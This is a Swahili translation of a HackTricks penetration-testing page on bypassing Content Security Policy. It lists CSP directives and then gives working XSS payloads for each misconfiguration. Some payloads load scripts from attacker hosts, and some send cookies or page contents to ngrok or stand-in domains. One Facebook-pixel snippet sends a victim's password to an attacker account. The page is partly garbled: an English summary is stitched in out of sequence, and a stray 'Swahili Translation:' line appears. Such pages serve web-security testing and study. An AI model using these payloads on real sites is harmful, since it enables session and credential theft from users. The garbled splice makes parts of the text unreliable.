hacktricks/pentesting-web/content-security-policy-csp-bypass/README.md

# Kizuizi cha Usalama wa Yaliyomo (CSP) Kupitisha

<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>

Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na wakati wabunifu wa uzoefu na wawindaji wa zawadi za mdudu!

**Machapisho ya Kuvamia**\
Shiriki na yaliyomo yanayochimba kina cha msisimko na changamoto za kuvamia

**Habari za Kuvamia za Wakati Halisi**\
Kaa up-to-date na ulimwengu wa kuvamia wenye haraka kupitia habari na ufahamu wa wakati halisi

**Matangazo ya Karibuni**\
Baki mwelekezwa na zawadi mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wabunifu bora leo!

## Ni Nini CSP

Kizuizi cha Usalama wa Yaliyomo (CSP) kinatambuliwa kama teknolojia ya kivinjari, iliyolenga hasa **kulinda dhidi ya mashambulizi kama vile udukuzi wa tovuti nyingine (XSS)**. Kinafanya kazi kwa kufafanua na kuelezea njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi ni pamoja na mambo mbalimbali kama picha, fremu, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka kwa kikoa kile kile (self), ikiwa ni pamoja na rasilimali za ndani na utekelezaji wa nambari ya mstari kupitia kazi kama vile `eval`, `setTimeout`, au `setInterval`.

Utekelezaji wa CSP unafanywa kupitia **vichwa vya majibu** au kwa kuingiza **vipengele vya meta ndani ya ukurasa wa HTML**. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa ufanisi na mara moja kuzuia uvunjaji wowote uliogunduliwa.

* Imetekelezwa kupitia kichwa cha majibu:
```
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
* Imetekelezwa kupitia lebo ya meta:
```xml
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
```
### Vichwa

CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa hivi:

* `Content-Security-Policy`: Inatekeleza CSP; kivinjari kinazuia uvunjaji wowote.
* `Content-Security-Policy-Report-Only`: Hutumika kwa ufuatiliaji; inaripoti uvunjaji bila kuwazuia. Ni bora kwa ajili ya majaribio katika mazingira ya awali kabla ya uzalishaji.

### Kutambua Rasilmali

CSP inazuia asili za kupakia yaliyomo ya moja kwa moja na ya kupitisha, ikidhibiti mambo kama utekelezaji wa JavaScript ya moja kwa moja na matumizi ya `eval()`. Sera ya mfano ni:
```bash
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
### Maelekezo

* **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URL, script za ndani, na scripts zinazosababishwa na wakati wa matukio au XSLT stylesheets.
* **default-src**: Inaweka sera ya msingi kwa kupata rasilimali wakati maelekezo maalum ya kupata hayapo.
* **child-src**: Inabainisha rasilimali zinazoruhusiwa kwa wafanyakazi wa mtandao na maudhui ya fremu zilizojumuishwa.
* **connect-src**: Inazuia URL ambazo zinaweza kupakia kutumia interfaces kama vile fetch, WebSocket, XMLHttpRequest.
* **frame-src**: Inazuia URL kwa fremu.
* **frame-ancestors**: Inabainisha ni vyanzo vipi vinaweza kujumuisha ukurasa wa sasa, inayotumika kwa vipengele kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
* **img-src**: Inadefinisha vyanzo vilivyoidhinishwa kwa ajili ya picha.
* **font-src**: Inabainisha vyanzo halali kwa fonts zinazopakiwa kwa kutumia `@font-face`.
* **manifest-src**: Inadefinisha vyanzo vilivyoidhinishwa vya faili za maandishi ya maombi.
* **media-src**: Inadefinisha vyanzo vilivyoidhinishwa kwa kupakia vitu vya media.
* **object-src**: Inadefinisha vyanzo vilivyoidhinishwa kwa vipengele vya `<object>`, `<embed>`, na `<applet>`.
* **base-uri**: Inabainisha URL zilizoruhusiwa kwa kupakia kutumia vipengele vya `<base>`.
* **form-action**: Inaorodhesha vituo halali vya kutuma fomu.
* **plugin-types**: Inazuia aina za mime ambazo ukurasa unaweza kuita.
* **upgrade-insecure-requests**: Inaagiza vivinjari kubadilisha URL za HTTP kuwa HTTPS.
* **sandbox**: Inatumia vizuizi sawa na sifa ya sandbox ya `<iframe>`.
* **report-to**: Inabainisha kikundi ambacho ripoti itatumwa ikiwa sera itavunjwa.
* **worker-src**: Inabainisha vyanzo halali kwa Worker, SharedWorker, au scripts za ServiceWorker.
* **prefetch-src**: Inabainisha vyanzo halali kwa rasilimali zitakazopakuliwa au kuhifadhiwa mapema.
* **navigate-to**: Inazuia URL ambazo waraka unaweza kuvinjari kwa njia yoyote (a, fomu, window.location, window.open, n.k.)

### Vyanzo

* `*`: Inaruhusu URL zote isipokuwa zile zenye mifumo ya `data:`, `blob:`, `filesystem:`.
* `'self'`: Inaruhusu kupakia kutoka kwa kikoa kile kile.
* `'data'`: Inaruhusu rasilimali kupakiwa kupitia mfumo wa data (k.m., picha zilizooanishwa kwa Base64).
* `'none'`: Inazuia kupakia kutoka kwa chanzo chochote.
* `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na mbinu zinazofanana, sio kupendekezwa kwa sababu za usalama.
* `'unsafe-hashes'`: Inawezesha wakati maalum wa matukio ya ndani.
* `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za ndani kama vile `<script>` au `<style>`, sio kupendekezwa kwa sababu za usalama.
* `'nonce'`: Orodha nyeupe kwa ajili ya scripts za ndani maalum zikitumia nonce ya kriptografia (namba inayotumiwa mara moja).
* Ikiwa una utekelezaji mdogo wa JS, ni rahisi kupata nonce iliyotumiwa ndani ya ukurasa kwa `doc.defaultView.top.document.querySelector("[nonce]")` na kisha kutumia tena kuiweka script yenye nia mbaya (ikiwa strict-dynamic inatumika, chanzo chochote kilichoruhusiwa kinaweza kupakia vyanzo vipya hivyo hii haikuhitajiki), kama ifuatavyo:

<details>

<summary>Pakia script ukitumia nonce</summary>
```html
<!-- From https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/ -->
<img src=x ng-on-error='
doc=$event.target.ownerDocument;
a=doc.defaultView.top.document.querySelector("[nonce]");
b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)'>
```
</details>

* `'sha256-<hash>'`: Weupe scripts na hash maalum ya sha256.
* `'strict-dynamic'`: Inaruhusu kupakia scripts kutoka chanzo chochote ikiwa imewekwa kwenye orodha nyeupe kwa njia ya nonce au hash.
* `'host'`: Inabainisha mwenyeji maalum, kama vile `example.com`.
* `https:`: Inazuia URLs zinazotumia HTTPS tu.
* `blob:`: Inaruhusu rasilimali kupakia kutoka kwenye URL za Blob (k.m., URL za Blob zilizoundwa kupitia JavaScript).
* `filesystem:`: Inaruhusu rasilimali kupakia kutoka kwenye mfumo wa faili.
* `'report-sample'`: Inajumuisha sampuli ya nambari inayokiuka katika ripoti ya ukiukaji (inayofaa kwa ajili ya kutatua hitilafu).
* `'strict-origin'`: Kama 'self' lakini inahakikisha kiwango cha usalama wa itifaki ya vyanzo vinavyolingana na hati (mizizi salama tu inaweza kupakia rasilimali kutoka mizizi salama).
* `'strict-origin-when-cross-origin'`: Inatuma URLs kamili wakati wa kufanya maombi ya asili lakini inatuma asili tu wakati ombi ni la msalaba-asili.
* `'unsafe-allow-redirects'`: Inaruhusu rasilimali kupakia ambazo zitaelekeza mara moja kwenye rasilimali nyingine. Sio rahisi kwa sababu inapunguza usalama.

## Sheria Hatari za CSP

### 'unsafe-inline'
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```
Kifurushi kinachofanya kazi: `"/><script>alert(1);</script>`

#### self + 'unsafe-inline' kupitia Iframes

{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
[csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md)
{% endcontent-ref %}

### 'unsafe-eval'

{% hint style="danger" %}
Hii haifanyi kazi, kwa maelezo zaidi [**angalia hii**](https://github.com/HackTricks-wiki/hacktricks/issues/653).
{% endhint %}
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
```
Payload inayofanya kazi:
```html
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```
### strict-dynamic

Ikiwa kwa namna fulani unaweza kufanya **msimbo wa JS ulioruhusiwa uunde lebo mpya ya script** katika DOM na msimbo wako wa JS, kwa sababu script iliyoruhusiwa inaunda hiyo, **lebo mpya ya script itaruhusiwa kutekelezwa**.

### Wildcard (\*)
```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *;
```
Payload inayofanya kazi:
```markup
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Ukosefu wa object-src na default-src

{% hint style="danger" %}
**Inaonekana kama hii sio tena inafanya kazi**
{% endhint %}
```yaml
Content-Security-Policy: script-src 'self' ;
```
Payloads zinazofanya kazi:
```markup
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
### Kupakia Faili + 'self'
```yaml
Content-Security-Policy: script-src 'self';  object-src 'none' ;
```
Ikiwa unaweza kupakia faili ya JS unaweza kuzidi CSP hii:

Payload inayofanya kazi:
```markup
"/>'><script src="/uploads/picture.png.js"></script>
```
Hata hivyo, ni uwezekano mkubwa kwamba server ina **thibitisha faili iliyopakiwa** na itaruhusu tu **kupakia aina fulani ya faili**.

Zaidi ya hayo, hata kama ungeweza kupakia **msimbo wa JS ndani** ya faili ukitumia kipanuzi kinachokubaliwa na server (kama vile: _script.png_) hii haitoshi kwa sababu baadhi ya server kama server ya apache **huchagua aina ya MIME ya faili kulingana na kipanuzi** na vivinjari kama Chrome **kukataa kutekeleza msimbo wa Javascript** ndani ya kitu ambacho kinapaswa kuwa picha. "Kwa bahati mbaya", kuna makosa. Kwa mfano, kutoka kwenye CTF nilijifunza kwamba **Apache haifahamu** kipanuzi cha _**.wave**_, hivyo haipatii na **aina ya MIME kama audio/\***.

Kutoka hapa, ikiwa unapata XSS na upakiaji wa faili, na unafanikiwa kupata **kipanuzi kilichochanganywa**, unaweza kujaribu kupakia faili yenye kipanuzi hicho na Maudhui ya script. Au, ikiwa server inathibitisha muundo sahihi wa faili iliyopakiwa, tengeneza polyglot ([baadhi ya mifano ya polyglot hapa](https://github.com/Polydet/polyglot-database)).

### Form-action

Ikiwa haiwezekani kuingiza JS, bado unaweza kujaribu kuvuja kwa mfano vibali **kwa kuingiza hatua ya fomu** (na labda kutarajia mameneja wa nywila kujaza nywila moja kwa moja). Unaweza kupata [**mfano katika ripoti hii**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Pia, kumbuka kwamba `default-src` haifuniki hatua za fomu.

### Njia za Tatu za Mwisho + ('unsafe-eval')

{% hint style="warning" %}
Kwa baadhi ya mzigo ufuatao **`unsafe-eval` hata haifai**.
{% endhint %}
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
Pakia toleo lenye kasoro la angular na tekeleza JS ya kupendelea:
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>


"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>


"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>


With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
</script>
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
#### Payloads zinazotumia Angular + maktaba yenye kazi zinazorudisha kipengele cha `window` ([angalia chapisho hili](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):

{% hint style="info" %}
Chapisho linaonyesha kwamba unaweza **kupakia** maktaba zote kutoka `cdn.cloudflare.com` (au maktaba zingine zilizoruhusiwa za JS), tekeleza kazi zote zilizoongezwa kutoka kila maktaba, na angalia **kazi zipi kutoka maktaba zipi zinarudisha kipengele cha `window`**.
{% endhint %}
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().alert('xss')}}
</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{[].erase.call().alert('xss')}}
</div>
```
### Angular XSS kutoka kwa jina la darasa:

Swahili Translation:
### Angular XSS kutoka kwa jina la darasa:
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
```
#### Kudhuru kanuni ya JS ya google recaptcha

Kulingana na [**hii CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves) unaweza kutumia vibaya [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza kanuni ya JS ya kupita kwenye CSP:
```html
<div
ng-controller="CarouselController as c"
ng-init="c.init()"
>
&#91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
<div carousel><div slides></div></div>

<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
Zaidi [**payloads kutoka kwenye andiko hili**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
```html
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<!-- Trigger alert -->
<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>

<!-- Reuse nonce -->
<img src=x ng-on-error='
doc=$event.target.ownerDocument;
a=doc.defaultView.top.document.querySelector("[nonce]");
b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)'>
```
#### Kutumia www.google.com kwa ajili ya kurejeleza wazi

URL ifuatayo inarejelea kwenye example.com (kutoka [hapa](https://www.landh.tech/blog/20240304-google-hack-50000/)):
```
https://www.google.com/amp/s/example.com/
```
### Endpoints ya Tatu ya Tatu + JSONP

Inawezekana kutumia Google Apps Script kupokea habari kwenye ukurasa ndani ya script.google.com. Kama ilivyo [fanywa katika ripoti hii](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
Mazingira kama haya ambapo `script-src` imewekwa kama `self` na kikoa fulani ambacho kimeorodheshwa kwenye orodha nyeupe inaweza kukiukwa kwa kutumia JSONP. Vituo vya JSONP huruhusu njia za kurejelea zisizo salama ambazo huruhusu mshambuliaji kutekeleza XSS, mzigo wa kazi:
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
```

```html
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **inaendelea kutumia JSONP endpoints kwa kuzidi kwa CSP kwenye tovuti tofauti.**

Ugunduzi sawa utatokea ikiwa **endpoint iliyosadikika ina Open Redirect** kwa sababu ikiwa endpoint ya awali inasadikika, maelekezo yanasadikika.

### Mabaya ya Tatu

Kama ilivyoelezwa katika [chapisho lifuatalo](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna uwanja wengi wa tatu, ambao huenda ukaruhusiwa mahali fulani katika CSP, unaweza kutumika kwa kuchukua data au kutekeleza nambari ya JavaScript. Baadhi ya watoa huduma hawa wa tatu ni:

| Entiti            | Uwanja Ulioruhusiwa                          | Uwezo       |
| ----------------- | -------------------------------------------- | ------------ |
| Facebook          | www.facebook.com, \*.facebook.com            | Kuchukua     |
| Hotjar            | \*.hotjar.com, ask.hotjar.io                 | Kuchukua     |
| Jsdelivr          | \*.jsdelivr.com, cdn.jsdelivr.net            | Kutekeleza   |
| Amazon CloudFront | \*.cloudfront.net                            | Kuchukua, Kutekeleza  |
| Amazon AWS        | \*.amazonaws.com                             | Kuchukua, Kutekeleza  |
| Azure Websites    | \*.azurewebsites.net, \*.azurestaticapps.net | Kuchukua, Kutekeleza  |
| Salesforce Heroku | \*.herokuapp.com                             | Kuchukua, Kutekeleza  |
| Google Firebase   | \*.firebaseapp.com                           | Kuchukua, Kutekeleza  |

Ikiwa utapata uwanja wowote ulioruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza kuzidi CSP kwa kusajili kwenye huduma ya tatu na, ama kuchukua data kwenda kwenye huduma hiyo au kutekeleza nambari.

Kwa mfano, ikiwa utapata CSP ifuatayo:
```
Content-Security-Policy​: default-src 'self’ www.facebook.com;​
```
### Bypassing Content Security Policy (CSP)

#### Introduction

Content Security Policy (CSP) is a security standard that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks by allowing web developers to control the resources that a user agent is allowed to load for a specific web page. However, misconfigurations or weaknesses in the CSP implementation can sometimes allow attackers to bypass these security controls.

#### Bypass Techniques

1. **Unsafe Inline Scripts**: If a CSP allows unsafe-inline scripts, an attacker can execute arbitrary code by injecting malicious scripts directly into HTML attributes such as `onclick` or `onmouseover`.

2. **Unsafe Eval**: CSPs that allow the use of `unsafe-eval` can be exploited by attackers to execute dynamic code using functions like `eval()`.

3. **Data Injection**: Attackers can abuse data injection vulnerabilities to bypass CSP restrictions and execute malicious code.

4. **Trusted Endpoints**: If a CSP whitelists domains that are vulnerable to subdomain takeovers, attackers can exploit this to serve malicious content from a trusted domain.

#### Conclusion

While Content Security Policy is a powerful security mechanism, it is crucial to configure it correctly to prevent bypasses and ensure the protection of web applications against various attacks. Regular security assessments and testing can help identify and mitigate CSP bypass vulnerabilities effectively.
```
Content-Security-Policy​: connect-src www.facebook.com;​
```
Unapaswa kuweza kuchukua data, kama ilivyokuwa daima imefanywa na [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, unafuata hatua hizi kuu:

1. Unda akaunti ya Facebook Developer hapa.
2. Unda programu mpya ya "Facebook Login" na chagua "Tovuti".
3. Nenda kwa "Mipangilio -> Msingi" na pata "Kitambulisho cha Programu yako (App ID)".
4. Kwenye tovuti lengwa unayotaka kuchukua data kutoka, unaweza kuchukua data moja kwa moja kwa kutumia kifaa cha Facebook SDK "fbq" kupitia "tukio la desturi" na mzigo wa data.
5. Nenda kwa "Meneja wa Matukio ya Programu" yako na chagua programu uliyounda (kumbuka meneja wa matukio unaweza kupatikana kwenye URL kama hii: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
6. Chagua kichupo "Matukio ya Majaribio" kuona matukio yanayotumwa na tovuti "yako".

Kisha, upande wa mwathiriwa, tekeleza nambari ifuatayo kuanzisha pikseli ya ufuatiliaji wa Facebook ili ielekeze kwenye akaunti ya Facebook ya muundaji wa mshambuliaji na kutuma tukio la desturi kama hili:
```JavaScript
fbq('init', '1279785999289471');​ // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{​
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
});
```
Kuhusu uwanja wa tatu wa tatu uliotajwa katika meza iliyopita, kuna njia nyingine nyingi unazoweza kuzitumia vibaya. Angalia [chapisho la blogi](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) hapo awali kwa maelezo zaidi kuhusu matumizi mabaya ya uwanja wa tatu.

### Kupitia RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>

Mbali na kuelekeza kwa njia ya kuzidi vikwazo vya njia vilivyotajwa hapo juu, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) inayoweza kutumika kwenye baadhi ya seva.

Kwa mfano, ikiwa CSP inaruhusu njia `https://example.com/scripts/react/`, inaweza kuzidiwa kama ifuatavyo:
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
Kivinjari itaingiza hatimaye `https://example.com/scripts/angular/angular.js`.

Hii inafanya kazi kwa sababu kwa kivinjari, unapakia faili iliyoitwa `..%2fangular%2fangular.js` iliyoko chini ya `https://example.com/scripts/react/`, ambayo inakubaliana na CSP.

Kwa hivyo, wataidecode, wakiiomba kwa ufanisi `https://example.com/scripts/react/../angular/angular.js`, ambayo ni sawa na `https://example.com/scripts/angular/angular.js`.

Kwa **kutumia hitilafu hii katika tafsiri ya URL kati ya kivinjari na seva, sheria za njia zinaweza kukiukwa**.

Suluhisho ni kutotambua `%2f` kama `/` upande wa seva, kuhakikisha tafsiri thabiti kati ya kivinjari na seva ili kuepuka shida hii.

Mfano Mtandaoni:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)

### Utekelezaji wa JS kupitia Iframes

{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %}

### **base-uri** iliyopotea

Ikiwa mwelekeo wa **base-uri** haujapatikana unaweza kutumia kufanya [**injini ya alama inayotungikwa**](../dangling-markup-html-scriptless-injection/).

Zaidi, ikiwa **ukurasa unapakia script kwa kutumia njia ya kihusishi** (kama `<script src="/js/app.js">`) ukitumia **Nonce**, unaweza kutumia **tag ya msingi** kufanya iweze **kupakia** script kutoka **kwenye seva yako mwenyewe kufikia XSS.**\
Ikiwa ukurasa unaopatikana ni wa **httpS**, tumia url ya httpS kwenye msingi.
```html
<base href="https://www.attacker.com/">
```
### Matukio ya AngularJS

Sera maalum inayojulikana kama Sera ya Usalama wa Yaliyomo (CSP) inaweza kuzuia matukio ya JavaScript. Walakini, AngularJS inaleta matukio ya desturi kama mbadala. Ndani ya tukio, AngularJS hutoa kitu cha pekee `$event`, kirejelea kitu cha tukio la kivinjari asilia. Kitu hiki cha `$event` kinaweza kutumika kukiuka CSP. Hasa, katika Chrome, kitu cha `$event/event` kina sifa ya `path`, kinashikilia safu ya vitu iliyohusishwa katika mnyororo wa utekelezaji wa tukio, na kitu cha `window` kawaida kikiwa kwenye mwisho. Muundo huu ni muhimu kwa mikakati ya kutoroka kwenye sanduku.

Kwa kuongoza safu hii kwa kichujio cha `orderBy`, inawezekana kuipitia, kutumia kipengee cha mwisho (kitu cha `window`) kuzindua kazi ya ulimwengu kama vile `alert()`. Msimbo uliodhihirishwa hapa chini unaelezea mchakato huu:
```xml
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
```
Hii sehemu inaonyesha matumizi ya agizo la `ng-focus` kuzindua tukio, kutumia `$event.path|orderBy` kubadilisha safu ya `path`, na kutumia kitu cha `window` kutekeleza kazi ya `alert()`, hivyo kufunua `document.cookie`.

**Pata njia zingine za kuzidisha Angular katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)

### AngularJS na kikoa kilichoorodheshwa kwenye orodha nyeupe
```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
### Kupitisha Sera ya Usalama wa Yaliyomo (CSP)

Sera ya CSP ambayo inaweka orodha nyeupe ya vikoa kwa kupakia skripti katika programu ya Angular JS inaweza kupuuzwa kupitia wito wa kazi za kurudi na baadhi ya mbinu zenye mapungufu. Taarifa zaidi kuhusu mbinu hii inapatikana kwenye mwongozo kamili uliopo kwenye [hifadhi ya git hii](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22).

Mizigo inayofanya kazi:
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
Other JSONP arbitrary execution endpoints can be found in [**hapa**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (some of them were deleted or fixed)

### Kupitisha kupitia Uelekezaji

Nini hutokea wakati CSP inakutana na uelekezaji upande wa seva? Ikiwa uelekezaji unapelekea kwenye asili tofauti ambayo haikubaliki, bado itashindwa.

Hata hivyo, kulingana na maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa uelekezaji unapelekea kwenye njia tofauti, inaweza kupitisha vizuizi vya awali.

Hapa kuna mfano:
```html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d">
</head>
<body>
<div id=userContent>
<script src="https://https://www.google.com/test"></script>
<script src="https://https://www.google.com/a/test"></script>
<script src="http://localhost:5555/301"></script>
</div>
</body>
</html>
```
Ikiwa CSP imewekwa kwa `https://www.google.com/a/b/c/d`, kwani njia inazingatiwa, hati zote `/test` na `/a/test` zitazuiliwa na CSP.

Walakini, mwisho wa `http://localhost:5555/301` uta **rejeshwa upande wa seva kwenda `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Kwa kuwa ni mwelekeo, **njia haijazingatiwa**, na **hati inaweza kupakia**, hivyo kukiuka kizuizi cha njia.

Kwa mwelekeo huu, hata ikiwa njia imeelezwa kabisa, bado itapuuzwa.

Kwa hivyo, suluhisho bora ni kuhakikisha kuwa tovuti haina udhaifu wowote wa kuhamisha wazi na kwamba hakuna uwanja ambao unaweza kutumiwa katika sheria za CSP.

### Kupuuza CSP na alama ya kuteleza

Soma [hapa](../dangling-markup-html-scriptless-injection/) jinsi ya kufanya hivyo.

### 'unsafe-inline'; img-src \*; kupitia XSS
```
default-src 'self' 'unsafe-inline'; img-src *;
```
`'unsafe-inline'` inamaanisha unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na `img-src *` inamaanisha unaweza kutumia kwenye ukurasa picha yoyote kutoka kwenye chanzo chochote.

